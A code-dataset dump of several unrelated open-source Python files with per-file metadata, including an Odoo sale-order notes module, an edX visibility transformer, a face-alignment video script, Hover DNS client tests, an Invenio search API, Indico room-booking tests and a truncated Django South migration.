self.assertEqual(test_response.status_code, 404) | mit | 4,207,600,598,767,648,300 | 47.748322 | 135 | 0.6403 | false | 4.336119 | true | false | false |
Micronaet/micronaet-mx8 | note_manage_sale/note.py | 1 | 3165 | # -*- coding: utf-8 -*-
###############################################################################
#
# Copyright (C) 2001-2014 Micronaet SRL (<http://www.micronaet.it>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
import os
import sys
import logging
import openerp
import openerp.netsvc as netsvc
import openerp.addons.decimal_precision as dp
from openerp.osv import fields, osv, expression, orm
from datetime import datetime, timedelta
from dateutil.relativedelta import relativedelta
from openerp import SUPERUSER_ID, api
from openerp import tools
from openerp.tools.translate import _
from openerp.tools.float_utils import float_round as round
from openerp.tools import (DEFAULT_SERVER_DATE_FORMAT,
DEFAULT_SERVER_DATETIME_FORMAT,
DATETIME_FORMATS_MAP,
float_compare)
_logger = logging.getLogger(__name__)
class SaleOder(orm.Model):
""" Sale order note
"""
_inherit = 'sale.order'
def onchange_note(self, cr, uid, ids, item_id, field, context=None):
''' On change pre
'''
res = {'value': {}}
if item_id:
res['value'][field] = self.pool.get('res.note.template').browse(
cr, uid, item_id, context=context)['text']
return res
_columns = {
'text_note_pre_id': fields.many2one('res.note.template',
'Set pre'),
'text_note_post_id': fields.many2one('res.note.template',
'Set post'),
'text_note_pre': fields.text('Pre text'),
'text_note_post': fields.text('Post text'),
'text_delivery_note': fields.text('Delivery note'),
}
class SaleOderLine(orm.Model):
""" Sale order line note
"""
_inherit = 'sale.order.line'
def onchange_note(self, cr, uid, ids, item_id, field, context=None):
''' On change pre
'''
res = {'value': {}}
if item_id:
res['value'][field] = self.pool.get('res.note.template').browse(
cr, uid, item_id, context=context)['text']
return res
_columns = {
'text_note_pre_id': fields.many2one('res.note.template',
'Set pre'),
'text_note_post_id': fields.many2one('res.note.template',
'Set post'),
'text_note_pre': fields.text('Pre text'),
'text_note_post': fields.text('Post text'),
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | -2,294,202,357,215,178,500 | 34.561798 | 79 | 0.600632 | false | 3.936567 | false | false | false |
deepsrijit1105/edx-platform | lms/djangoapps/course_blocks/transformers/visibility.py | 15 | 2329 | """
Visibility Transformer implementation.
"""
from openedx.core.lib.block_structure.transformer import BlockStructureTransformer, FilteringTransformerMixin
from .utils import collect_merged_boolean_field
class VisibilityTransformer(FilteringTransformerMixin, BlockStructureTransformer):
"""
A transformer that enforces the visible_to_staff_only field on
blocks by removing blocks from the block structure for which the
user does not have access. The visible_to_staff_only field on a
block is percolated down to its descendants, so that all blocks
enforce the visibility settings from their ancestors.
For a block with multiple parents, access is denied only if
visibility is denied for all its parents.
Staff users are exempted from visibility rules.
"""
VERSION = 1
MERGED_VISIBLE_TO_STAFF_ONLY = 'merged_visible_to_staff_only'
@classmethod
def name(cls):
"""
Unique identifier for the transformer's class;
same identifier used in setup.py.
"""
return "visibility"
@classmethod
def _get_visible_to_staff_only(cls, block_structure, block_key):
"""
Returns whether the block with the given block_key in the
given block_structure should be visible to staff only per
computed value from ancestry chain.
"""
return block_structure.get_transformer_block_field(
block_key, cls, cls.MERGED_VISIBLE_TO_STAFF_ONLY, False
)
@classmethod
def collect(cls, block_structure):
"""
Collects any information that's necessary to execute this
transformer's transform method.
"""
collect_merged_boolean_field(
block_structure,
transformer=cls,
xblock_field_name='visible_to_staff_only',
merged_field_name=cls.MERGED_VISIBLE_TO_STAFF_ONLY,
)
def transform_block_filters(self, usage_info, block_structure):
# Users with staff access bypass the Visibility check.
if usage_info.has_staff_access:
return [block_structure.create_universal_filter()]
return [
block_structure.create_removal_filter(
lambda block_key: self._get_visible_to_staff_only(block_structure, block_key),
)
]
| agpl-3.0 | -5,523,226,499,395,695,000 | 34.287879 | 109 | 0.669815 | false | 4.427757 | false | false | false |
Stunkymonkey/face2movie | face2movie.py | 1 | 8450 | #!/usr/bin/env python3
import sys
import os.path
from math import atan, pi
import argparse
try:
import numpy as np
except:
sys.exit("Please install numpy")
try:
import cv2
except:
sys.exit("Please install OpenCV")
# Parser
parser = argparse.ArgumentParser()
parser.add_argument("-i", "--imagefolder", type=str,
dest="imagefolder", help="Path of images", required=True)
parser.add_argument("-s", "--facescale", type=str, dest="facescale",
help="scale of the face (default is 1/3)")
parser.add_argument("-f", "--fps", type=str, dest="fps",
help="fps of the resulting file (default is 24)")
parser.add_argument("-n", "--nameoftargetfile", type=str, dest="outputfile",
help="name of the output file")
parser.add_argument("-w", "--write", action="store_true", dest="write",
default=False, help="to write every single image to file")
parser.add_argument("-r", "--reverse", action="store_true", dest="reverse",
default=False, help="iterate the files reversed")
parser.add_argument("-q", "--quiet", action="store_false", dest="quiet",
default=True, help="the output should be hidden")
parser.add_argument("-m", "--multiplerender", action="store_true",
dest="multiplerender", default=False,
help="render the images multiple times")
# parsing the input
args = parser.parse_args()
imagefolder = args.imagefolder + "/"
if imagefolder is None:
sys.exit("No images given")
facescale = args.facescale
if facescale is None:
facescale = float(1.0 / 3)
else:
facescale = float(facescale)
if args.fps is None:
fps = 24
else:
fps = float(args.fps)
outputfile = args.outputfile
if outputfile is None:
outputfile = "animation"
write = bool(args.write)
reverse = bool(args.reverse)
quiet = bool(args.quiet)
multiplerender = bool(args.multiplerender)
# OpenCV files
if (os.path.isfile("haarcascade_frontalface_default.xml")):
face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
else:
sys.exit("haarcascade_frontalface_default.xml not found")
if (os.path.isfile("haarcascade_eye.xml")):
eye_cascade = cv2.CascadeClassifier('haarcascade_eye.xml')
else:
sys.exit("haarcascade_eye.xml not found")
def dectectFace(gray):
"""detecting faces"""
if multiplerender:
for i in np.arange(1.05, 1.65, 0.02)[::-1]:
faces = face_cascade.detectMultiScale(
gray, scaleFactor=i, minNeighbors=5, minSize=(60, 60))
if len(faces) == 1:
return faces
elif len(faces) > 1:
return None
# print(str(i) + "- useless calc:" + str(faces))
# print("no face found")
return None
else:
return face_cascade.detectMultiScale(
gray, scaleFactor=1.3, minNeighbors=5, minSize=(60, 60))
def detectEye(roi_gray):
"""detecting eyes"""
if multiplerender:
for i in np.arange(1.01, 1.10, 0.01)[::-1]:
eyes = eye_cascade.detectMultiScale(
roi_gray, scaleFactor=i, minNeighbors=5, minSize=(25, 25))
if len(eyes) == 2:
return eyes
elif len(eyes) > 2:
return None
# print(str(i) + "- useless calc:" + str(eyes))
# print("no eyes found")
return None
else:
return eye_cascade.detectMultiScale(
roi_gray, scaleFactor=1.05, minNeighbors=5, minSize=(25, 25))
def drawFaces(faces, img):
"""drawing faces (for debug)"""
for (x, y, w, h) in faces:
cv2.rectangle(img, (x, y), (x + w, y + h), (255, 0, 0), 1)
def drawEyes(eyes, img):
"""drawing eyes (for debug)"""
for (ex, ey, ew, eh) in eyes:
cv2.rectangle(img, (ex, ey), (ex + ew, ey + eh), (0, 255, 0), 1)
def detect(img, gray):
"""getting the image and returns the face and eyes"""
faces = dectectFace(gray)
# for making sure only having one face
if faces is None or len(faces) != 1:
return None, None
# drawFaces(faces, img)
for (x, y, w, h) in faces:
roi_gray = gray[y:y + h, x:x + w]
# roi_color = img[y:y + h, x:x + w]
eyes = detectEye(roi_gray)
# making sure only having two eyes
if eyes is None or len(eyes) != 2:
return None, None
# drawEyes(eyes, roi_color)
return faces, eyes
def matrixPicture(face, eyes, height, width):
"""calculation of rotation and movement of the image"""
center = tuple((face[0] + (face[2] / 2), face[1] + (face[3] / 2)))
moveMatrix = np.float32([[1, 0, (width / 2) - center[0]],
[0, 1, (height / 2) - center[1]]])
scale = float(min(height, width)) / float(face[2]) * facescale
eye1 = tuple((eyes[0][0] + (eyes[0][2] / 2),
eyes[0][1] + (eyes[0][3] / 2)))
eye2 = tuple((eyes[1][0] + (eyes[1][2] / 2),
eyes[1][1] + (eyes[1][3] / 2)))
x = (float(eye2[0]) - float(eye1[0]))
y = (float(eye2[1]) - float(eye1[1]))
if x == 0:
angle = 0
else:
angle = atan(y / x) * 180 / pi
rotMatrix = cv2.getRotationMatrix2D(center, angle, scale)
return moveMatrix, rotMatrix
def calculatePicture(file):
"""gettings infos of the image and applie the matrixes"""
img = cv2.imread(file)
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
faces, eyes = detect(img, gray)
# print("faces: " + str(faces) + " # eyes:" + str(eyes))
height, width, channels = img.shape
if faces is None or eyes is None:
return None
face = faces[0]
eye = [eyes[0], eyes[1]]
moveMatrix, rotMatrix = matrixPicture(face, eye, height, width)
dst = cv2.warpAffine(img, moveMatrix, (width, height))
dst = cv2.warpAffine(dst, rotMatrix, (width, height))
return dst
def checkInput():
""" check input and return files """
files = []
if imagefolder:
for file in os.listdir(imagefolder):
if os.path.isfile(os.path.join(imagefolder, file)) and not file.startswith("."):
files.append(imagefolder + file)
if len(files) == 0:
sys.exit("No files found")
if reverse:
files.sort(reverse=True)
else:
files.sort()
return files
def toMovie():
""" iterating the files and save them to movie-file """
files = checkInput()
codecs = cv2.VideoWriter_fourcc(*'FMP4')
height, width, channel = cv2.imread(files[0]).shape
video = cv2.VideoWriter(outputfile + ".mkv", codecs,
fps, (width, height), True)
if not video.isOpened():
sys.exit("Error when writing video file")
images = 0
found = 0
for file in files:
dst = calculatePicture(file)
images = images + 1
if quiet:
sys.stdout.flush()
sys.stdout.write("\rimages: " + str(images) + "/" +
str(len(files)) + " and " + str(found) +
" added to movie")
if dst is not None and video.isOpened():
found = found + 1
video.write(dst)
video.release()
if quiet:
print()
print("saved to " + outputfile + ".mkv")
def toFile():
""" iterating files and save them seperately """
destdir = os.path.join(os.path.abspath(".") + r"/tmp/")
import subprocess
files = checkInput()
if not os.path.exists(destdir):
os.makedirs(destdir)
for file in files:
dst = calculatePicture(file)
if dst is not None:
"""
try:
cv2.imshow('face2gif', dst)
cv2.waitKey(0)
except (KeyboardInterrupt):
cv2.destroyAllWindows()
cv2.destroyAllWindows()
"""
cv2.imwrite(destdir + os.path.basename(file), dst)
if quiet:
print("all files are safed in: " + str(destdir))
print("now generating gif ...")
print(subprocess.call(["convert", "-delay", fps,
"-loop", "0", "tmp/*.jpeg",
outputfile + ".gif"]))
else:
subprocess.call(["convert", "-delay", fps,
"-loop", "0", "tmp/*.jpeg", outputfile + ".gif"])
if __name__ == '__main__':
if write:
toFile()
else:
toMovie()
| mit | 5,641,609,435,180,680,000 | 30.64794 | 92 | 0.564734 | false | 3.463115 | false | false | false |
worldofchris/hover-client | hover/test/test_hover.py | 1 | 4699 | # -*- coding: utf-8 -*-
import unittest
from mock import patch, PropertyMock, Mock
import requests
from hover.client import HoverClient
class TestHover(unittest.TestCase):
def setUp(self):
self.DNS_ID = 12345
with patch('requests.post') as patched_post, patch('requests.request') as patched_request:
type(patched_post.return_value).ok = PropertyMock(return_value=True)
type(patched_post.return_value).cookies = PropertyMock(
return_value={"hoverauth": "foo",
"domains": []})
type(patched_request.return_value).ok = PropertyMock(return_value=True)
type(patched_request.return_value).json = Mock(
return_value={"succeeded": True,
"domains": [{"domain_name": "worldofchris.com",
"id": self.DNS_ID}]})
username = 'mrfoo'
password = 'keyboardcat'
domain_name = 'worldofchris.com'
self.client = HoverClient(username=username,
password=password,
domain_name=domain_name)
def testInitClient(self):
"""
Initalise the client
"""
self.assertEqual(self.client.dns_id, self.DNS_ID)
def testAddCname(self):
"""
Add a CNAME
"""
with patch('requests.request') as patched_request:
type(patched_request.return_value).json = Mock(
return_value={"succeeded": True})
expected = {"succeeded": True}
actual = self.client.add_record(type="CNAME",
name="megatron",
content="crazyland.aws.com")
self.assertEqual(actual, expected)
def testGetRecord(self):
"""
Get a record so we can check if it exists and has the
expected value
"""
with patch('requests.request') as patched_request:
type(patched_request.return_value).json = Mock(
side_effect=[{"succeeded": True,
"domains": [{"entries": [{"type": "CNAME",
"name": "megatron",
"content": "crazyland.aws.com",
"id": "dns1234"}]}
]}])
expected = {"name": "megatron",
"type": "CNAME",
"content": "crazyland.aws.com",
"id": "dns1234"}
actual = self.client.get_record(type="CNAME",
name="megatron")
self.assertEqual(actual, expected)
def testUpdateCname(self):
"""
Update content for an existing record
"""
with patch('requests.request') as patched_request:
type(patched_request.return_value).json = Mock(
side_effect=[{"succeeded": True,
"domains": [{"entries": [{"type": "CNAME",
"name": "megatron",
"content": "blah",
"id": "dns1234"}]}
]},
{"succeeded": True}])
expected = {"succeeded": True}
actual = self.client.update_record(type="CNAME",
name="megatron",
content="foo.aws.com")
self.assertEqual(actual, expected)
def testRemoveCname(self):
"""
Remove a CNAME
"""
with patch('requests.request') as patched_request:
type(patched_request.return_value).json = Mock(
side_effect=[{"succeeded": True,
"domains": [{"entries": [{"type": "CNAME",
"name": "megatron",
"content": "blah",
"id": "dns1234"}]}
]},
{"succeeded": True}])
expected = {"succeeded": True}
actual = self.client.remove_record(type="CNAME",
name="megatron")
self.assertEqual(actual, expected)
| bsd-2-clause | -7,305,272,005,122,384,000 | 40.219298 | 98 | 0.423707 | false | 5.203765 | true | false | false |
tiborsimko/invenio-search | invenio_search/api.py | 1 | 6164 | # -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2015-2018 CERN.
#
# Invenio is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Search engine API."""
import hashlib
from functools import partial
from elasticsearch import VERSION as ES_VERSION
from elasticsearch_dsl import FacetedSearch, Search
from elasticsearch_dsl.faceted_search import FacetedResponse
from elasticsearch_dsl.query import Bool, Ids
from flask import current_app, request
from .proxies import current_search_client
class DefaultFilter(object):
"""Shortcut for defining default filters with query parser."""
def __init__(self, query=None, query_parser=None):
"""Build filter property with query parser."""
self._query = query
self.query_parser = query_parser or (lambda x: x)
@property
def query(self):
"""Build lazy query if needed."""
return self._query() if callable(self._query) else self._query
def __get__(self, obj, objtype):
"""Return parsed query."""
return self.query_parser(self.query)
class MinShouldMatch(str):
"""Work-around for Elasticsearch DSL problem.
The ElasticSearch DSL Bool query tries to inspect the
``minimum_should_match`` parameter, but understands only integers and not
queries like "0<1". This class circumvents the specific problematic clause
in Elasticsearch DSL.
"""
def __lt__(self, other):
"""Circumvent problematic Elasticsearch DSL clause."""
return False
def __le__(self, other):
"""Circumvent problematic Elasticsearch DSL clause."""
return False
def __gt__(self, other):
"""Circumvent problematic Elasticsearch DSL clause."""
return False
def __ge__(self, other):
"""Circumvent problematic Elasticsearch DSL clause."""
return False
class RecordsSearch(Search):
"""Example subclass for searching records using Elastic DSL."""
class Meta:
"""Configuration for ``Search`` and ``FacetedSearch`` classes."""
index = '_all'
doc_types = None
fields = ('*', )
facets = {}
default_filter = None
"""Default filter added to search body.
Example: ``default_filter = DefaultFilter('_access.owner:"1"')``.
"""
def __init__(self, **kwargs):
"""Use Meta to set kwargs defaults."""
kwargs.setdefault('index', getattr(self.Meta, 'index', None))
kwargs.setdefault('doc_type', getattr(self.Meta, 'doc_types', None))
kwargs.setdefault('using', current_search_client)
kwargs.setdefault('extra', {})
min_score = current_app.config.get('SEARCH_RESULTS_MIN_SCORE')
if min_score:
kwargs['extra'].update(min_score=min_score)
super(RecordsSearch, self).__init__(**kwargs)
default_filter = getattr(self.Meta, 'default_filter', None)
if default_filter:
# NOTE: https://github.com/elastic/elasticsearch/issues/21844
self.query = Bool(minimum_should_match=MinShouldMatch("0<1"),
filter=default_filter)
def get_record(self, id_):
"""Return a record by its identifier.
:param id_: The record identifier.
:returns: The record.
"""
return self.query(Ids(values=[str(id_)]))
def get_records(self, ids):
"""Return records by their identifiers.
:param ids: A list of record identifier.
:returns: A list of records.
"""
return self.query(Ids(values=[str(id_) for id_ in ids]))
@classmethod
def faceted_search(cls, query=None, filters=None, search=None):
"""Return faceted search instance with defaults set.
:param query: Elastic DSL query object (``Q``).
:param filters: Dictionary with selected facet values.
:param search: An instance of ``Search`` class. (default: ``cls()``).
"""
search_ = search or cls()
class RecordsFacetedSearch(FacetedSearch):
"""Pass defaults from ``cls.Meta`` object."""
index = search_._index[0]
doc_types = getattr(search_.Meta, 'doc_types', ['_all'])
fields = getattr(search_.Meta, 'fields', ('*', ))
facets = getattr(search_.Meta, 'facets', {})
def search(self):
"""Use ``search`` or ``cls()`` instead of default Search."""
# Later versions of `elasticsearch-dsl` (>=5.1.0) changed the
# Elasticsearch FacetedResponse class constructor signature.
if ES_VERSION[0] > 2:
return search_.response_class(FacetedResponse)
return search_.response_class(partial(FacetedResponse, self))
return RecordsFacetedSearch(query=query, filters=filters or {})
def with_preference_param(self):
"""Add the preference param to the ES request and return a new Search.
The preference param avoids the bouncing effect with multiple
replicas, documented on ES documentation.
See: https://www.elastic.co/guide/en/elasticsearch/guide/current
/_search_options.html#_preference for more information.
"""
user_hash = self._get_user_hash()
if user_hash:
return self.params(preference=user_hash)
return self
def _get_user_agent(self):
"""Retrieve the request's User-Agent, if available.
Taken from Flask Login utils.py.
"""
user_agent = request.headers.get('User-Agent')
if user_agent:
user_agent = user_agent.encode('utf-8')
return user_agent or ''
def _get_user_hash(self):
"""Calculate a digest based on request's User-Agent and IP address."""
if request:
user_hash = '{ip}-{ua}'.format(ip=request.remote_addr,
ua=self._get_user_agent())
alg = hashlib.md5()
alg.update(user_hash.encode('utf8'))
return alg.hexdigest()
return None
| mit | 5,341,746,374,392,759,000 | 33.435754 | 78 | 0.611778 | false | 4.236426 | false | false | false |
tlake/advent-of-code | 2016/day04_security_through_obscurity/python/src/part1.py | 1 | 1245 | #!/usr/bin/env python
"""Docstring."""
from collections import Counter
from functools import reduce
from common import (
get_input,
)
class RoomAnalyzer:
"""."""
def __init__(self, input_list=[]):
"""."""
self.input_list = input_list
def process_room_string(self, room_string):
"""."""
name = room_string[:-11].replace("-", "")
sector_id = int(room_string[-10:-7])
checksum = room_string[-6:-1]
return name, sector_id, checksum
def room_is_real(self, room_name, room_checksum):
"""."""
counter = Counter(room_name)
checked = ''.join(map(lambda x: x[0], sorted(counter.most_common(), key=lambda x: (-x[1], x[0]))))[:5]
return bool(checked == room_checksum)
def analyze_room(self, room_string):
"""."""
name, sector_id, checksum = self.process_room_string(room_string)
return sector_id if self.room_is_real(name, checksum) else 0
def analyze_input(self):
"""."""
return reduce((lambda x, y: x + y), list(map(self.analyze_room, self.input_list)))
if __name__ == "__main__":
puzzle_input = get_input()
analyzer = RoomAnalyzer(get_input())
print(analyzer.analyze_input())
| mit | 4,726,723,384,833,023,000 | 27.295455 | 110 | 0.578313 | false | 3.536932 | false | false | false |
Lotame/api-examples | py/update_behavior_aliases.py | 1 | 1702 | '''
Please note that this file is an example, not an official Lotame-supported
tool. The Support team at Lotame does not provide support for this script,
as it's only meant to serve as a guide to help you use the Services API.
Filename: update_behavior_aliases.py
Author: Brett Coker
Python Version: 3.6.3
Updated: 12/19/17
Adds new aliases to behaviors. Takes an .xlsx as an argument.
The spreadsheet should be formatted as follows:
- Header row required
- First column is behavior IDs
- Second column is aliases.
'''
import sys
import openpyxl
import better_lotameapi
def main():
if len(sys.argv) == 1:
print(f'Usage: python {sys.argv[0]} aliases.xlsx')
return
lotame = better_lotameapi.Lotame()
option = 0
while option not in ['1', '2']:
print('Select option:')
print('1. Replace variants')
print('2. Append variants')
option = input('Option: ')
filename = sys.argv[1]
workbook = openpyxl.load_workbook(filename)
sheet_names = workbook.get_sheet_names()
sheet = workbook.get_sheet_by_name(sheet_names[0])
for row in range(2, sheet.max_row + 1):
behavior_id = str(sheet[f'A{row}'].value)
new_alias = str(sheet[f'B{row}'].value)
endpoint = f'behaviors/{behavior_id}/aliases'
info = lotame.get(endpoint).json()
if option == '1': # Replace
info['alias'] = [new_alias]
else: # Append
info['alias'].append(new_alias)
status = lotame.put(endpoint, info).status_code
print(f'Behavior {behavior_id} | HTTP {status}')
if __name__ == '__main__':
main()
| mit | -7,778,892,717,763,026,000 | 27.366667 | 78 | 0.615159 | false | 3.621277 | false | false | false |
Mocha2007/mochalib | hangman_solver_nadeko.py | 1 | 1481 | from json import load
from re import match, search
from typing import Set
alphabet = 'abcdefghijklmnopqrstuvwxyz'
hangman_data = load(open('hangman.json', 'r'))
all_words = [[i['Word'] for i in word] for word in [category for category in hangman_data.values()]]
all_words = {j.lower() for i in all_words for j in i} # type: Set[str]
def solve_all(pattern: str, ignore_set: str = '') -> Set[str]:
re_alphabet = ''.join([letter for letter in alphabet if letter not in set(pattern)])
re_pattern = pattern.replace('_', '['+re_alphabet+']')
possible_words = set()
for word in all_words:
if ignore_set and search('['+ignore_set+']', word):
continue
if len(word) == len(pattern) and match(re_pattern, word):
possible_words.add(word)
print(possible_words)
return possible_words
def recommend_letter(word_set: Set[str], ignore_set: str = '') -> str:
"""Given a set of possible answers, return a guess to whittle down as many answers as possible."""
letter_histogram = {letter: abs(len(word_set)//2-sum(letter in word for word in word_set))
for letter in alphabet if letter not in ignore_set}
return sorted(letter_histogram.items(), key=lambda x: x[1])[0][0]
while 1:
status = input('>>> ')
try:
if ';' in status:
status, ignore = status.split(';')
else:
ignore = ''
solution_set = solve_all(status, ignore)
print(list(solution_set)[0] if len(solution_set) == 1 else recommend_letter(solution_set, ignore))
except Exception as e:
print(e)
| gpl-3.0 | 8,181,521,549,108,761,000 | 34.261905 | 100 | 0.681972 | false | 3.157783 | false | false | false |
OmeGak/indico | indico/modules/rb/tasks_test.py | 2 | 7957 | # This file is part of Indico.
# Copyright (C) 2002 - 2019 CERN
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the MIT License; see the
# LICENSE file for more details.
from collections import defaultdict
from datetime import datetime
from itertools import chain
import dateutil.parser
from indico.modules.rb import rb_settings
from indico.modules.rb.models.reservations import RepeatFrequency
from indico.modules.rb.tasks import roombooking_end_notifications, roombooking_occurrences
pytest_plugins = 'indico.modules.rb.testing.fixtures'
settings = {
'notification_before_days': 2,
'notification_before_days_weekly': 5,
'notification_before_days_monthly': 7,
'end_notification_daily': 1,
'end_notification_weekly': 3,
'end_notification_monthly': 7
}
users = {
'x': {'first_name': 'Mister', 'last_name': 'Evil'},
'y': {'first_name': 'Doctor', 'last_name': 'No'}
}
rooms = {
'a': {
'notification_before_days': None,
'notification_before_days_weekly': None,
'notification_before_days_monthly': None,
'end_notification_daily': None,
'end_notification_weekly': None,
'end_notification_monthly': None
},
'b': {
'notification_before_days': 10,
'notification_before_days_weekly': 11,
'notification_before_days_monthly': 12,
'end_notification_daily': 2,
'end_notification_weekly': 4,
'end_notification_monthly': 8
}
}
reservations = [
{
'start_dt': '2017-03-31 15:00',
'end_dt': '2017-04-10 16:00',
'repeat_frequency': RepeatFrequency.DAY,
'room': 'a',
'user': 'x',
'notification': '2017-04-03',
},
{
'start_dt': '2017-04-03 12:00',
'end_dt': '2017-04-03 14:00',
'repeat_frequency': RepeatFrequency.NEVER,
'room': 'a',
'user': 'x',
'notification': '2017-04-03',
},
{
'start_dt': '2017-03-30 12:00',
'end_dt': '2017-05-04 14:00',
'repeat_frequency': RepeatFrequency.WEEK,
'room': 'a',
'user': 'x',
'notification': '2017-04-06',
},
{
'start_dt': '2017-04-08 12:00',
'end_dt': '2017-05-13 14:00',
'repeat_frequency': RepeatFrequency.MONTH,
'room': 'a',
'user': 'y',
'notification': '2017-04-08',
},
{
'start_dt': '2017-04-11 12:00',
'end_dt': '2017-04-11 14:00',
'repeat_frequency': RepeatFrequency.NEVER,
'room': 'b',
'user': 'x',
'notification': '2017-04-11', # today + 10
},
{
'start_dt': '2017-04-03 12:00',
'end_dt': '2017-04-03 14:00',
'repeat_frequency': RepeatFrequency.NEVER,
'room': 'b',
'user': 'x',
'notification': None, # room has today+10 not today+1
},
]
finishing_reservations = [
{
'start_dt': '2019-07-08 12:00',
'end_dt': '2019-07-08 14:00',
'repeat_frequency': RepeatFrequency.NEVER,
'room': 'b',
'user': 'x',
'end_notification': False
},
{
'start_dt': '2019-07-07 14:00',
'end_dt': '2019-07-07 14:30',
'repeat_frequency': RepeatFrequency.NEVER,
'room': 'a',
'user': 'x',
'end_notification': False
},
{
'start_dt': '2019-07-07 14:30',
'end_dt': '2019-07-09 15:00',
'repeat_frequency': RepeatFrequency.DAY,
'room': 'a',
'user': 'x',
'end_notification': True
},
{
'start_dt': '2019-07-07 15:00',
'end_dt': '2019-07-10 15:10',
'repeat_frequency': RepeatFrequency.DAY,
'room': 'a',
'user': 'x',
'end_notification': False
},
{
'start_dt': '2019-07-07 15:10',
'end_dt': '2019-07-10 15:20',
'repeat_frequency': RepeatFrequency.DAY,
'room': 'b',
'user': 'y',
'end_notification': True
},
{
'start_dt': '2019-07-07 15:20',
'end_dt': '2019-07-11 15:30',
'repeat_frequency': RepeatFrequency.DAY,
'room': 'b',
'user': 'y',
'end_notification': False
},
{
'start_dt': '2019-07-05 15:30',
'end_dt': '2019-07-12 15:40',
'repeat_frequency': RepeatFrequency.WEEK,
'room': 'b',
'user': 'y',
'end_notification': True
},
{
'start_dt': '2019-07-05 15:40',
'end_dt': '2019-07-15 15:50',
'repeat_frequency': RepeatFrequency.WEEK,
'room': 'b',
'user': 'y',
'end_notification': True
},
{
'start_dt': '2019-07-05 15:50',
'end_dt': '2019-07-19 16:00',
'repeat_frequency': RepeatFrequency.WEEK,
'room': 'b',
'user': 'y',
'end_notification': False
},
{
'start_dt': '2019-07-04 16:00',
'end_dt': '2019-07-11 16:10',
'repeat_frequency': RepeatFrequency.WEEK,
'room': 'a',
'user': 'x',
'end_notification': True
}
]
def test_roombooking_notifications(mocker, create_user, create_room, create_reservation, freeze_time):
rb_settings.set_multi(settings)
user_map = {key: create_user(id_, **data) for id_, (key, data) in enumerate(users.iteritems(), 1)}
room_map = {key: create_room(**data) for key, data in rooms.iteritems()}
notification_map = defaultdict(dict)
end_notification_map = defaultdict(dict)
for data in chain(reservations, finishing_reservations):
data['start_dt'] = dateutil.parser.parse(data['start_dt'])
data['end_dt'] = dateutil.parser.parse(data['end_dt'])
data['booked_for_user'] = user = user_map[data.pop('user')]
data['room'] = room_map[data['room']]
notification = data.pop('notification', None)
end_notification = data.pop('end_notification', None)
reservation = create_reservation(**data)
if notification:
notification_map[user][reservation] = dateutil.parser.parse(notification).date()
if end_notification is not None:
end_notification_map[user][reservation] = end_notification
notify_upcoming_occurrences = mocker.patch('indico.modules.rb.tasks.notify_upcoming_occurrences')
notify_about_finishing_bookings = mocker.patch('indico.modules.rb.tasks.notify_about_finishing_bookings')
freeze_time(datetime(2017, 4, 1, 8, 0, 0))
roombooking_occurrences()
for (user, occurrences), __ in notify_upcoming_occurrences.call_args_list:
notifications = notification_map.pop(user)
for occ in occurrences:
date = notifications.pop(occ.reservation)
assert occ.start_dt.date() == date
assert occ.notification_sent
past_occs = [x for x in occ.reservation.occurrences if x.start_dt.date() < date.today()]
future_occs = [x for x in occ.reservation.occurrences if x.start_dt.date() > date.today() and x != occ]
assert not any(x.notification_sent for x in past_occs)
if occ.reservation.repeat_frequency == RepeatFrequency.DAY:
assert all(x.notification_sent for x in future_occs)
else:
assert not any(x.notification_sent for x in future_occs)
assert not notifications # no extra notifications
assert not notification_map # no extra users
freeze_time(datetime(2019, 7, 8, 8, 0, 0))
roombooking_end_notifications()
for (user, user_finishing_reservations), __ in notify_about_finishing_bookings.call_args_list:
end_notifications = end_notification_map.pop(user)
for reservation in user_finishing_reservations:
should_be_sent = end_notifications.pop(reservation)
assert reservation.end_notification_sent == should_be_sent
assert all(not r.end_notification_sent for r in end_notifications)
assert not end_notification_map
| mit | 5,526,023,487,916,892,000 | 32.57384 | 115 | 0.576851 | false | 3.390285 | false | false | false |
davivcgarcia/wttd-15 | eventex/core/migrations/0002_auto__add_talk.py | 1 | 2973 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Talk'
db.create_table(u'core_talk', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('title', self.gf('django.db.models.fields.CharField')(max_length=200)),
('description', self.gf('django.db.models.fields.TextField')()),
('start_time', self.gf('django.db.models.fields.TimeField')(blank=True)),
))
db.send_create_signal(u'core', ['Talk'])
# Adding M2M table for field speakers on 'Talk'
m2m_table_name = db.shorten_name(u'core_talk_speakers')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('talk', models.ForeignKey(orm[u'core.talk'], null=False)),
('speaker', models.ForeignKey(orm[u'core.speaker'], null=False))
))
db.create_unique(m2m_table_name, ['talk_id', 'speaker_id'])
def backwards(self, orm):
# Deleting model 'Talk'
db.delete_table(u'core_talk')
# Removing M2M table for field speakers on 'Talk'
db.delete_table(db.shorten_name(u'core_talk_speakers'))
models = {
u'core.contact': {
'Meta': {'object_name': 'Contact'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'kind': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'speaker': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Speaker']"}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'core.speaker': {
'Meta': {'object_name': 'Speaker'},
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
